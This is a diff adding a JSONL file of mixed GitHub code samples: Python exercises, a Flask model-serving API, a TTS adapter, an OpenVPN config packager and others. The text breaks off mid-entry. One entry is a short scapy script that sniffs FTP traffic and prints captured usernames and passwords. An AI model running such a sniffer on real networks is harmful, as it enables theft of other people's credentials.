diff --git "a/3674.jsonl" "b/3674.jsonl" new file mode 100644--- /dev/null +++ "b/3674.jsonl" @@ -0,0 +1,815 @@ +{"seq_id":"27650961227","text":"from random import randrange, choice\r\nfrom threading import Thread\r\nfrom time import sleep\r\n\r\nfrom center_print import print\r\n\r\nrunning = False\r\n\r\n\r\ndef scrambler(animation_text):\r\n chars = '#*@!?$%+&'\r\n animation_text = animation_text.split()\r\n\r\n while True:\r\n text = list()\r\n for word in animation_text:\r\n word = list(word)\r\n word[randrange(len(word))] = choice(chars)\r\n text.append(''.join(word))\r\n if running:\r\n print(' '.join(text), end='\\r')\r\n sleep(0.05)\r\n else:\r\n return\r\n\r\n\r\ndef animate(message_text='', end=0):\r\n global running\r\n if not end:\r\n running = True\r\n t = Thread(target=scrambler, args=(message_text,))\r\n t.start()\r\n else:\r\n running = False\r\n sleep(0.1)\r\n if message_text:\r\n blink(message_text)\r\n\r\n\r\n# printProgressBar function has been written by Greenstick at https://gist.github.com/greenstick/c34d044225293c9b191f\r\ndef printProgressBar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█'):\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n filledLength = int(length * iteration // total)\r\n bar = fill * filledLength + '-' * (length - filledLength)\r\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end='\\r')\r\n if iteration == total:\r\n print('\\r Pages collected ', center=0)\r\n\r\n\r\ndef blink(message):\r\n print(message, end='\\r')\r\n sleep(0.3)\r\n print(' ' * 120, end='\\r')\r\n sleep(0.2)\r\n print(message, end='\\r')\r\n sleep(0.1)\r\n print(' ' * 120, end='\\r')\r\n sleep(0.1)\r\n print(message)\r\n","repo_name":"ankit1w/OCD","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24316972444","text":"'''\nDesafio 003 - Feito\nCrie um programa que leia dois números e tente mostrar a soma entre eles.\nExemplo:\n\"Primeiro número: 6\"\n\"Segundo número: 3\"\n\"A soma é 63 (errado, o certo é 9)\"\nJuntar uma string na outra é concatenação, somar não é concatenar.\n'''\n\n# 1ª forma\np_num = int(input('Primeiro número: ')) # Quando se abre um \"input\" sem difinir nada antes, o Python assume que é string, nesse caso a soma não daria certo.\ns_num = int(input('Segundo número: ')) # \"int\" funciona melhor para números inteiros do que \"float\".\nprint('A soma é:', (p_num + s_num)) # Aqui o \"+\" não funciona, pois não se pode concatenar com \"+\" str com int, tem que usar \",\".\n\nprint('')\n\n# 2ª forma\nn1 = int(input('Digite um valor: '))\nn2 = int(input('Digite outro valor: '))\ns = n1 + n2\nprint('A soma vale', s)\n\nprint('')\n\n# 3ª forma\nn1 = int(input('Primeiro número: '))\nn2 = int(input('Segundo número: '))\nsoma = n1 + n2\nprint('A soma vale: {}'.format(soma))\n\nprint('')\n\n# 4ª forma\nn1 = int(input('Primeiro número: '))\nn2 = int(input('Segundo número: '))\nsoma = n1 + n2\nprint('A soma entre', n1 , 'e', n2 , 'vale {}.'.format(soma)) # Com a \",\" no final ficava um espaço entre o número da soma e o \".\".\n\nprint('')\n\n# 5ª forma\nn1 = int(input('Primeiro número: '))\nn2 = int(input('Segundo número: '))\nsoma = n1 + n2\nprint('A soma entre {} e {} vale {}.'.format(n1, n2, soma)) # A forma máis prática de representar.\n","repo_name":"marcosmorandi/exercicios-python","sub_path":"desafios/d003.py","file_name":"d003.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39481110295","text":"#!/usr/bin/python3\nfrom flask import *\nfrom flask_restful import *\nfrom json import dumps\nimport subprocess\n\nfrom AIengine import *\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\napp = Flask(__name__)\napi = Api(app)\n\nprivateModels = dict()\n\nuserModelRoot = lambda obj: './models/'# + obj['user']\n\nclass Classify(Resource):\n def post(self):\n # Get Data (Image/Vector), type (img,vec), 'user' - username\n obj = request.get_json(force=True)\n #print(obj)\n if obj['user'] not in privateModels:\n # Not yet loaded in memory, load it\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n images = np.array(obj['data'])\n if obj['preprocess'] == True:\n images, status = AIengine.preprocess(images)\n results, status = privateModels[obj['user']].classify(images, clfType = obj['type'])\n #print(np.array(obj['data']).shape)\n print(results)\n return jsonify(results)\n\n \nclass Train(Resource):\n def post(self):\n # Get Data (Image/Vector), labels (Names), type (img,vec), 'user' - username\n obj = request.get_json(force=True)\n #print(obj)\n if obj['user'] not in privateModels:\n # Not yet loaded in memory, load it\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n images = np.array(obj['data'])\n if obj['preprocess'] == True:\n images, status = AIengine.preprocess(images)\n results, status = privateModels[obj['user']].fit(images, obj['labels'], obj['type'])\n privateModels[obj['user']].save(userModelRoot(obj))\n #print(results)\n return jsonify(results)\n\n\nclass Similarity(Resource):\n def post(self):\n # Get Data (Image1, data), 'user' - username, type = img if data is img, else vec\n obj = request.get_json(force=True)\n #print(obj)\n if obj['user'] not in privateModels:\n # Not yet loaded in memory, load it\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n img = np.array([obj['img']])\n if obj['preprocess'] == True:\n img, status = AIengine.preprocess(img)\n\n if obj['type'] == 'img':\n data = np.array([obj['data']])\n if obj['preprocess'] == True:\n data, status = AIengine.preprocess(data)\n results = privateModels[obj['user']].isSimilarII(img, data)\n else :\n results = privateModels[obj['user']].isSimilarIV(np.array([obj['img']]), np.array([obj['data']]))\n privateModels[obj['user']].save(userModelRoot(obj))\n print(results)\n return jsonify(results)\n\nclass loadModel(Resource):\n def post(self):\n obj = request.get_json(force=True)\n privateModels[obj['user']] = AIengine(userModelRoot(obj))\n return jsonify(\"Loaded\")\n\nclass saveModel(Resource):\n def post(self):\n obj = request.get_json(force=True)\n privateModels[obj['user']].save(userModelRoot(obj))\n return jsonify(\"Saved\")\n\nclass createModel(Resource):\n def post(self):\n obj = request.get_json(force=True)\n privateModels[obj['user']] = AIengine(userModelRoot(obj), create=True)\n return jsonify(\"Created\")\n\napi.add_resource(Classify, '/classify')\n\napi.add_resource(Train, '/train')\napi.add_resource(Similarity, '/similarity')\n\napi.add_resource(saveModel, '/save')\napi.add_resource(loadModel, '/load')\n\napi.add_resource(createModel, '/create')\n\n# WARNING: DO NOT RUN THIS ON MULTITHREADED WSGI SERVERS!\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='5000')\n\n\n\n","repo_name":"AshishKumar4/EagleEye","sub_path":"cloud_generator.py","file_name":"cloud_generator.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10204425452","text":"#!/usr/bin/env python3\n\"\"\"\nRuns a text to speech command that returns WAV audio on stdout or in a temp file.\n\"\"\"\nimport argparse\nimport io\nimport logging\nimport shlex\nimport subprocess\nimport tempfile\nimport wave\nfrom pathlib import Path\n\nfrom rhasspy3.audio import DEFAULT_SAMPLES_PER_CHUNK, AudioChunk, AudioStart, AudioStop\nfrom rhasspy3.event import read_event, write_event\nfrom rhasspy3.tts import Synthesize\n\n_FILE = Path(__file__)\n_DIR = _FILE.parent\n_LOGGER = logging.getLogger(_FILE.stem)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"command\",\n help=\"Command to run\",\n )\n parser.add_argument(\n \"--temp_file\",\n action=\"store_true\",\n help=\"Command has {temp_file} and will write output to it\",\n )\n parser.add_argument(\n \"--text\",\n action=\"store_true\",\n help=\"Command has {text} argument\",\n )\n #\n parser.add_argument(\n \"--samples-per-chunk\", type=int, default=DEFAULT_SAMPLES_PER_CHUNK\n )\n #\n parser.add_argument(\n \"--debug\", action=\"store_true\", help=\"Print DEBUG messages to console\"\n )\n args = parser.parse_args()\n logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)\n\n try:\n while True:\n event = read_event()\n if event is None:\n break\n\n if Synthesize.is_type(event.type):\n synthesize = Synthesize.from_event(event)\n wav_bytes = text_to_wav(args, synthesize.text)\n with io.BytesIO(wav_bytes) as wav_io:\n with wave.open(wav_io, \"rb\") as wav_file:\n rate = wav_file.getframerate()\n width = wav_file.getsampwidth()\n channels = wav_file.getnchannels()\n\n num_frames = wav_file.getnframes()\n audio_bytes = wav_file.readframes(num_frames)\n\n bytes_per_chunk = args.samples_per_chunk * width\n timestamp = 0\n write_event(\n AudioStart(rate, width, channels, timestamp=timestamp).event()\n )\n while audio_bytes:\n chunk = AudioChunk(\n rate,\n width,\n channels,\n audio_bytes[:bytes_per_chunk],\n timestamp=timestamp,\n )\n write_event(chunk.event())\n timestamp += chunk.milliseconds\n audio_bytes = audio_bytes[bytes_per_chunk:]\n\n write_event(AudioStop(timestamp=timestamp).event())\n except KeyboardInterrupt:\n pass\n\n\ndef text_to_wav(args: argparse.Namespace, text: str) -> bytes:\n command_str = args.command\n format_args = {}\n if args.text:\n format_args[\"text\"] = text\n text = \"\" # Pass as arg instead\n\n if args.temp_file:\n with tempfile.NamedTemporaryFile(mode=\"wb\", suffix=\".wav\") as wav_file:\n format_args[\"temp_file\"] = wav_file.name\n command_str = command_str.format(**format_args)\n command = shlex.split(command_str)\n\n # Send stdout to devnull so it doesn't interfere with our events\n subprocess.run(\n command, check=True, stdout=subprocess.DEVNULL, input=text.encode()\n )\n wav_file.seek(0)\n return Path(wav_file.name).read_bytes()\n\n else:\n command_str = command_str.format(**format_args)\n command = shlex.split(command_str)\n return subprocess.check_output(command, input=text.encode())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rhasspy/rhasspy3","sub_path":"bin/tts_adapter_text2wav.py","file_name":"tts_adapter_text2wav.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"72"} +{"seq_id":"2431576210","text":"from PIL import Image, ImageDraw\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef greyval(pixel):\r\n return (pixel[0] + pixel[1] + pixel[2]) // 3\r\n\r\n\r\nimage = Image.open(\"./images/Unequalized_Hawkes_Bay_NZ.jpg\")\r\npix = image.load()\r\n\r\nH = [0 for i in range(256)]\r\n\r\nfor i in range(image.size[0]):\r\n for j in range(image.size[1]):\r\n H[greyval(pix[i, j])] += 1\r\n\r\nCH = [0 for i in range(256)]\r\n\r\nCH[0] = H[0]\r\nfor i in range(1, 256):\r\n CH[i] = CH[i-1] + H[i]\r\n\r\nT = [0 for i in range(256)]\r\nfor i in range(256):\r\n T[i] = round((255*CH[i])/(image.size[0]*image.size[1]))\r\n\r\nnew = Image.new(\"RGB\", image.size)\r\ndraw = ImageDraw.Draw(new)\r\nfor i in range(image.size[0]):\r\n for j in range(image.size[1]):\r\n current_pix_grey_val = T[greyval(pix[i, j])]\r\n draw.point((i, j), (current_pix_grey_val,\r\n current_pix_grey_val, current_pix_grey_val))\r\n\r\nnew.save(\"new.jpg\", \"JPEG\")\r\n\r\npix = new.load()\r\nnewH = [0 for i in range(256)]\r\nfor i in range(image.size[0]):\r\n for j in range(image.size[1]):\r\n newH[greyval(pix[i, j])] += 1\r\n\r\nfig, (ax1, ax2) = plt.subplots(\r\n nrows=1, ncols=2,\r\n figsize=(16, 8)\r\n)\r\nax1.bar(range(1, 257), H, color='blue')\r\nax1.set_title('Гистограмма изображения до эквализации')\r\nax2.bar(range(1, 257), newH, color='green')\r\nax2.set_title('Гистограмма изображения после эквализации')\r\nplt.show()\r\n","repo_name":"SonyaVitkovskaya/BSUIR","sub_path":"OIIS/лаб_1/gistogramma.py","file_name":"gistogramma.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18199231787","text":"#!/usr/bin/env python\n# _*_ coding: utf8 _*_\n\nfrom scapy.all import *\nimport argparse\n\nparse = argparse.ArgumentParser()\nparse.add_argument(\"-i\",\"--interface\",help=\"Interfaz de red..\")\nparse = parse.parse_args()\n\ndef sniffer_ftp(pkt):\n\tif pkt[TCP].dport == 21:\n\t\tdata = pkt.sprintf(\"%Raw.load%\")\n\t\tif \"USER\" in data:\n\t\t\tprint(\"FTP IP: \"+ pkt[IP].dst)\n\t\t\tdata = data.split(\" \")\n\t\t\tdata = data[1]\n\t\t\tprint(\"USUARIO FTP: \" + data)\n\t\telif \"PASS\" in data:\n\t\t\tdata = data.split(\" \")\n\t\t\tdata = data[1]\n\t\t\tprint(\"CONTRASEÑA: \" + data)\n\ndef main():\n\tif parse.interface:\n\t\tprint(\"Sniffeando ...\")\n\t\tsniff(iface=parse.interface, filter=\"tcp and port 21\", prn=sniffer_ftp)\n\telse:\n\t\tprint(\"Necesito una interfaz de red..\")\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"5pok/python_scapy","sub_path":"sniffer_passwords.py","file_name":"sniffer_passwords.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32862585965","text":"from time import*\nfrom random import randint\n#with open('tx.txt') as f:\n# print(f.readline())\n'''\nclass RunningCodeJudge:\n def __init__(self):\n self.start = None\n\n def __enter__(self):\n self.start = time()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n t = time() - self.start\n print(f'{exc_tb}\\n{exc_val}\\n{exc_tb}')\n print(f'Время выполнения: {t}')\n return True\n\nwith RunningCodeJudge():\n lst = [abs(i) for i in range(1_000_000)]\n lst - 1\n\nlst = [1, 2 , 3]\nmy_iterator = iter(lst)\n\nfor i in my_iterator:\n print(i)'''\n\nclass RandomIter:\n def __init__(self, limit):\n self.limit = limit\n self.__reload = limit\n\n def __iter__(self):\n self.limit == self.__reload\n return self\n\n def __next__(self):\n if self.limit == 0:\n raise StopIteration # принудительно вызывает ошибку\n self.limit -= 1\n return randint(1, 100)\n\nrand_iter = RandomIter(5)\nfor i in rand_iter:\n print(i)\n\nrand_iter = RandomIter(9)\nfor i in rand_iter:\n print(i)","repo_name":"Nikolay1562005/Training_file","sub_path":"хз.py","file_name":"хз.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16239704072","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nhead = None\nsize_of_ll = 0\n\n\ndef insert_node(position, value):\n global head\n global size_of_ll\n if position >= 1 and position <= size_of_ll + 1:\n temp = ListNode(value)\n if position == 1:\n temp.next = head\n head = temp\n else:\n count = 1\n prev = head\n while count < position - 1:\n prev = prev.next\n count += 1\n temp.next = prev.next\n prev.next = temp\n size_of_ll += 1\n\n\ndef delete_node(position):\n global head\n global size_of_ll\n if position >= 1 and position <= size_of_ll:\n temp = None\n if position == 1:\n temp = head\n head = head.next\n else:\n count = 1\n prev = head\n while count < position - 1:\n prev = prev.next\n count += 1\n temp = prev.next\n prev.next = prev.next.next\n size_of_ll -= 1\n\n\ndef print_ll():\n global head\n tmp = head\n ans = []\n while tmp is not None:\n ans.append(str(tmp.val))\n tmp = tmp.next","repo_name":"aman-bcalm/Scaler-Problems","sub_path":"Day 21/LinkedListSoln.py","file_name":"LinkedListSoln.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15102272534","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\nimport os\nimport sys\nfrom arsoft.zipfileutils import ZipFileEx\nimport arsoft.crypto\nfrom arsoft.sshutils import *\nfrom OpenSSL import crypto\nfrom .configfile import ConfigFile\nfrom .systemconfig import SystemConfig\nimport arsoft.utils\nimport zipfile\nimport io\n\nclass ZipError(Exception):\n pass\n\nclass ZippedConfigFile(object):\n\n def __init__(self, filename=None, mode='r'):\n self.filename = filename\n self.mode = mode\n self._zip = None\n self._config_file_info = None\n self.last_error = None\n\n def __str__(self):\n if self._zip:\n return str(self.__class__.__name__) + '(%s;%s)' % (self.filename, self.name)\n else:\n return str(self.__class__.__name__) + '(%s)' % (self.filename)\n\n def _ensure_open(self):\n if self._zip is None:\n ret = self.open()\n else:\n ret = True\n return ret\n\n def open(self, filename=None, mode=None):\n if filename is None:\n filename = self.filename\n if mode is None:\n mode = self.mode\n\n try:\n self._zip = ZipFileEx(filename, mode)\n except zipfile.BadZipfile as e:\n self.last_error = e\n self._zip = None\n except IOError as e:\n self.last_error = e\n self._zip = None\n ret = True if self._zip else False\n return ret\n\n @staticmethod\n def is_zip_config_file(filename, mode='r'):\n try:\n fobj = ZipFileEx(filename, mode)\n if fobj:\n config_file_info = None\n fileinfolist = fobj.infolist()\n for fileinfo in fileinfolist:\n (basename, ext) = os.path.splitext(fileinfo.filename)\n if ext == '.ovpn' or ext == '.conf':\n config_file_info = fileinfo\n break\n ret = True if config_file_info else False\n fobj.close()\n else:\n ret = False\n except zipfile.BadZipfile as e:\n ret = False\n return ret\n\n @staticmethod\n def _create_add_file_to_zip(zipfile_fobj, cfgfile, file_to_add, arcname=None):\n if cfgfile.config_directory:\n source_file = os.path.join(cfgfile.config_directory, file_to_add)\n else:\n source_file = file_to_add\n if os.path.isfile(source_file):\n zipfile_fobj.write(source_file, arcname if arcname else file_to_add)\n ret = True\n error = None\n else:\n ret = False\n error = 'File %s does not exist' %(source_file)\n return (ret, error)\n\n @staticmethod\n def _create_add_key_file_to_zip(zipfile_fobj, cfgfile, file_to_add, key_passphrase=None, arcname=None):\n if cfgfile.config_directory:\n source_file = os.path.join(cfgfile.config_directory, file_to_add)\n else:\n source_file = file_to_add\n if os.path.isfile(source_file):\n org_keyfile = arsoft.crypto.KeyPEMFile(source_file)\n \n ret = org_keyfile.open()\n if ret:\n zip_keyfile_stream = io.BytesIO()\n ret = org_keyfile.export(zip_keyfile_stream, key_passphrase)\n if ret:\n data = zip_keyfile_stream.getvalue()\n zipfile_fobj.writestr(arcname if arcname else file_to_add, data)\n error = None\n else:\n ret = False\n error = 'File %s does not exist' %(source_file)\n return (ret, error)\n\n @staticmethod\n def create(cfgfile, output_file, key_passphrase=None):\n zip_cfgfile = cfgfile.clone()\n zip_ostype = cfgfile.ostype\n try:\n fobj = ZipFileEx(output_file, 'w')\n if fobj:\n ret = True\n if zip_ostype == 'windows' or zip_ostype == 'macosx':\n # create a flat zip file\n zip_private_directory = ''\n else:\n zip_private_directory = cfgfile.suggested_private_directory + '/'\n\n if ret and cfgfile.cert_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.cert_filename, zip_private_directory + 'cert.pem')\n if ret:\n zip_cfgfile.cert_filename = zip_private_directory + 'cert.pem'\n if ret and cfgfile.key_filename:\n try:\n if key_passphrase:\n ret, error = ZippedConfigFile._create_add_key_file_to_zip(fobj, cfgfile, cfgfile.key_filename, key_passphrase, zip_private_directory + 'key.pem')\n else:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.key_filename, zip_private_directory + 'key.pem')\n except arsoft.crypto.PrivateKeyError as e:\n error = e\n ret = False\n if ret:\n zip_cfgfile.key_filename = zip_private_directory + 'key.pem'\n if ret and cfgfile.ca_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.ca_filename, zip_private_directory + 'ca.pem')\n if ret:\n zip_cfgfile.ca_filename = zip_private_directory + 'ca.pem'\n if ret and cfgfile.dh_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.dh_filename, zip_private_directory + 'dh.pem')\n if ret:\n zip_cfgfile.dh_filename = zip_private_directory + 'dh.pem'\n if ret and cfgfile.crl_filename:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.crl_filename, zip_private_directory + 'crl.pem')\n if ret:\n zip_cfgfile.crl_filename = zip_private_directory + 'crl.pem'\n if ret and cfgfile.auth_user_pass_file:\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, cfgfile.auth_user_pass_file, zip_private_directory + 'auth_pass')\n if ret:\n zip_cfgfile.auth_user_pass_file = zip_private_directory + 'auth_pass'\n if ret and cfgfile.client_config_directory:\n #print('ccd dir %s' % (cfgfile.client_config_directory))\n zip_cfgfile.client_config_directory = zip_private_directory + 'ccd'\n for (client_name, client_config_file) in cfgfile.client_config_files.items():\n #print('add %s as %s' % (client_config_file, client_name))\n ret, error = ZippedConfigFile._create_add_file_to_zip(fobj, cfgfile, client_config_file.filename, zip_private_directory + 'ccd/' + client_name)\n if not ret:\n break\n if ret:\n zip_cfgfile.name = cfgfile.name\n zip_cfgfile_buf = io.BytesIO()\n zip_cfgfile_stream = io.TextIOWrapper(zip_cfgfile_buf)\n ret = zip_cfgfile.save(zip_cfgfile_stream)\n if ret:\n zip_cfgfile_stream.flush()\n fobj.writestr(zip_cfgfile.suggested_filename, zip_cfgfile_buf.getvalue())\n fobj.close()\n output_zip = ZippedConfigFile(output_file)\n if not ret:\n #if hasattr(output_file, 'write'):\n # os.remove(output_file.name)\n #else:\n # os.remove(output_file)\n output_zip.last_error = error\n ret = output_zip\n else:\n ret = None\n except zipfile.BadZipfile as e:\n raise ZipError(e)\n return ret\n\n @property\n def valid(self):\n ret = self._find_config_file()\n return ret\n\n def close(self):\n if self._zip is not None:\n self._zip.close()\n self._zip = None\n self._config_file_info = None\n \n def _find_config_file(self):\n if self._config_file_info is None:\n if self._ensure_open():\n fileinfolist = self._zip.infolist()\n for fileinfo in fileinfolist:\n (basename, ext) = os.path.splitext(fileinfo.filename)\n if ext == '.ovpn' or ext == '.conf':\n self._config_file_info = fileinfo\n break\n return True if self._config_file_info is not None else False\n \n def _find_file(self, filename):\n ret = None\n if self._ensure_open():\n fileinfolist = self._zip.infolist()\n for fileinfo in fileinfolist:\n if fileinfo.filename == filename:\n ret = fileinfo\n break\n return ret\n\n @property\n def name(self):\n cfgfile = self.config_file\n if cfgfile is not None:\n return cfgfile.name\n else:\n return None\n\n @property\n def config_filename(self):\n self._find_config_file()\n return self._config_file_info.filename if self._config_file_info else None\n\n @property\n def config_file(self):\n self._find_config_file()\n fp = self._zip.open(self._config_file_info.filename, self.mode) if self._config_file_info else None\n if not fp:\n return None\n # need to create a text IO wrapper because the ConfigFile requires a text stream and not a binary one\n txtfp = io.TextIOWrapper(fp)\n ret = ConfigFile(txtfp, zipfile=self)\n return ret\n \n def get_files_in_directory(self, dirname):\n ret = []\n fileinfolist = self._zip.infolist()\n for fileinfo in fileinfolist:\n if fileinfo.filename.startswith(dirname):\n ret.append(fileinfo.filename)\n return ret\n \n def extractall(self, target_directory):\n if self._ensure_open():\n self._zip.extractall(target_directory)\n ret = True\n else:\n ret = False\n return ret\n\n def __getitem__(self, name):\n fileinfo = self._find_file(name)\n return self._zip.open(fileinfo.filename, self.mode) if fileinfo else None\n \n def __iter__(self):\n if self._ensure_open():\n return iter(self._zip)\n else:\n return None\n \n def extract(self, name, target_directory, target_name=None):\n #print('extract %s to %s' %(name, target_directory))\n if self._ensure_open():\n if target_name is None:\n self._zip.extract(name, target_directory)\n ret = True\n else:\n dstname = os.path.join(target_directory, target_name)\n fileinfo = self._find_file(name)\n if fileinfo:\n fsrc = self._zip.open(fileinfo.filename, 'r')\n fdst = open(dstname, 'w')\n buf_length = 4096\n while 1:\n buf = fsrc.read(buf_length)\n if not buf:\n break\n fdst.write(buf)\n fsrc.close()\n fdst.close()\n ret = True\n else:\n ret = False\n else:\n ret = False\n return ret\n\n def install(self, autoStart=True, config_directory=None, root_directory=None):\n if config_directory is None:\n config_directory = '/etc/openvpn'\n if root_directory is None:\n target_config_directory = config_directory\n else:\n target_config_directory = root_directory + config_directory\n\n cfgfile = self.config_file\n ret = True if cfgfile else False\n if ret:\n if not os.path.isdir(target_config_directory):\n try:\n os.makedirs(target_config_directory)\n ret = True\n except IOError as OSError:\n ret = False\n if ret:\n private_config_directory = os.path.join(target_config_directory, cfgfile.suggested_private_directory)\n if not os.path.isdir(private_config_directory):\n try:\n os.makedirs(private_config_directory)\n ret = True\n except IOError as OSError:\n ret = False\n if ret and cfgfile.cert_filename:\n ret = self.extract(cfgfile.cert_filename, private_config_directory, 'cert.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'cert.pem'), target_config_directory)\n cfgfile.cert_filename = new\n if ret and cfgfile.key_filename:\n ret = self.extract(cfgfile.key_filename, private_config_directory, 'key.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'key.pem'), target_config_directory)\n cfgfile.key_filename = new\n if ret and cfgfile.ca_filename:\n ret = self.extract(cfgfile.ca_filename, private_config_directory, 'ca.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'ca.pem'), target_config_directory)\n cfgfile.ca_filename = new\n if ret and cfgfile.dh_filename:\n ret = self.extract(cfgfile.dh_filename, private_config_directory, 'dh.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'dh.pem'), target_config_directory)\n cfgfile.dh_filename = new\n if ret and cfgfile.crl_filename:\n ret = self.extract(cfgfile.crl_filename, private_config_directory, 'crl.pem')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'crl.pem'), target_config_directory)\n cfgfile.crl_filename = new\n if ret and cfgfile.auth_user_pass_file:\n ret = self.extract(cfgfile.crl_filename, private_config_directory, 'auth_pass')\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'auth_pass'), target_config_directory)\n cfgfile.auth_user_pass_file = new\n if ret and cfgfile.client_config_directory:\n private_config_directory_ccd = os.path.join(private_config_directory, 'ccd')\n if not os.path.isdir(private_config_directory_ccd):\n try:\n os.makedirs(private_config_directory_ccd)\n ret = True\n except IOError as OSError:\n ret = False\n if ret:\n for (client_name, client_config_file) in cfgfile.client_config_files.items():\n ret = self.extract(client_config_file.filename, private_config_directory_ccd, client_name)\n if not ret:\n break\n if ret:\n new = os.path.relpath(os.path.join(private_config_directory,'ccd'), target_config_directory)\n cfgfile.client_config_directory = new\n if ret:\n cfgfile.status_file = cfgfile.suggested_status_file\n cfgfile.status_version = cfgfile.suggested_status_version\n cfgfile.management = cfgfile.suggested_management\n if ret:\n target_config_file = os.path.join(target_config_directory, cfgfile.suggested_filename)\n ret = cfgfile.save(target_config_file)\n if not ret:\n self.last_error = cfgfile.last_error\n\n if ret:\n syscfg = SystemConfig(root_directory=root_directory)\n vpnname, ext = os.path.splitext(cfgfile.suggested_filename)\n new_autostart = syscfg.autostart\n if autoStart:\n new_autostart.add(vpnname)\n else:\n new_autostart.remove(vpnname)\n syscfg.autostart = new_autostart\n ret = syscfg.save()\n return ret\n\n def ssh_install(self, target_hostname, username=None, keyfile=None, stdout=None, stderr=None, \n outputStdErr=False, outputStdOut=False, allocateTerminal=False, x11Forwarding=False,\n cwd=None, env=None,\n verbose=False):\n try:\n inputfile = open(self.filename, 'r')\n except IOError as e:\n self.last_error = e\n inputfile = None\n if inputfile:\n # copy zip file to target host as stdin file\n commandline = '/usr/sbin/openvpn-admin --install -'\n\n (sts, stdout, stderr) = ssh_runcmdAndGetData(target_hostname, commandline=commandline, script=None, \n outputStdErr=outputStdErr, outputStdOut=outputStdOut, stdin=inputfile, stdout=stdout, stderr=stderr, cwd=cwd, env=env,\n allocateTerminal=allocateTerminal, x11Forwarding=x11Forwarding,\n keyfile=keyfile, username=username, verbose=verbose)\n sts = 0\n ret = True if sts == 0 else False\n inputfile.close()\n else:\n ret = False\n return ret\n \n @staticmethod\n class zip_config_compare_functor(object):\n def __init__(self, key_passphrase):\n self.key_passphrase = key_passphrase\n\n def __call__(self, selfzip, selfinfo, otherzip, otherinfo):\n ret = True\n if selfinfo.CRC != otherinfo.CRC:\n if os.path.basename(selfinfo.filename) == 'key.pem':\n selffp = selfzip.open(selfinfo)\n otherfp = otherzip.open(otherinfo)\n\n selfcontent = selffp.read()\n othercontent = otherfp.read()\n selffp.close()\n otherfp.close()\n\n ret = arsoft.crypto.compare_pem_key(selfcontent, othercontent, passphrase=self.key_passphrase)\n else:\n ret = False\n\n return ret\n \n def compare(self, otherzip, key_passphrase=None):\n if isinstance(otherzip, ZippedConfigFile):\n real_otherzip = otherzip._zip\n elif isinstance(otherzip, str):\n try:\n real_otherzip = ZipFileEx(otherzip, 'r')\n except zipfile.BadZipfile as e:\n self.last_error = e\n real_otherzip = None\n except IOError as e:\n self.last_error = e\n real_otherzip = None\n else:\n real_otherzip = otherzip\n self._ensure_open()\n if self._zip is None:\n return True if real_otherzip is None else False\n else:\n cmpfunc = ZippedConfigFile.zip_config_compare_functor(key_passphrase)\n return self._zip.compare(real_otherzip, date_time=False, content=True, compare_functor=cmpfunc)\n\nif __name__ == '__main__':\n c = ZippedConfigFile(sys.argv[1])\n\n print(c)\n print(c.config_file)\n print(c.config_file.ca_file)\n print(c[c.config_file.ca_file])\n print(iter(c))\n for f in iter(c):\n print(f.name)\n","repo_name":"aroth-arsoft/arsoft-python","sub_path":"python3/arsoft/openvpn/zippedconfigfile.py","file_name":"zippedconfigfile.py","file_ext":"py","file_size_in_byte":19551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3248558794","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Unit tests for message pipeline.\r\n\r\nThese tests make sure the message handling works as it should. \"\"\"\r\n\r\n__author__ = 'chuter'\r\n\r\n\r\nif __name__ == '__main__':\r\n\timport sys\r\n\tsys.path.insert(0, 